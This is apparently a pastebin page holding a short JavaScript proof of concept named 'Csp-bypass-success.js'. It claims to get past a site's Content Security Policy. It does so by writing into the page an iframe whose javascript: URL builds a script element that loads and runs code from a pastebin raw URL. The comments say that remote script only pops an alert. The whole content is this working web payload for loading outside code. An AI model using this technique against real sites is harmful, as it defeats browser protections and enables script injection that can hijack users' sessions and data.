JAVASCRIPT 31
Csp-bypass-success.js Guest on 13th August 2020 05:11:14 AM
  1. /* this is a script that pops an alert message */
  2. top._CVE_URL = 'https://pastebin.com/raw/dw5cWGK6';
  3.  
  4. /* this call will succeed although CSP */
  5. document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = document.createElement(\"script\");s.src = \"https://pastebin.com/raw/dw5cWGK6\";document.body.appendChild(s);'></iframe>";

Paste is for source code and general debugging text.

Login or Register to edit, delete and keep track of your pastes and more.

Raw Paste

Login or Register to edit or fork this paste. It's free.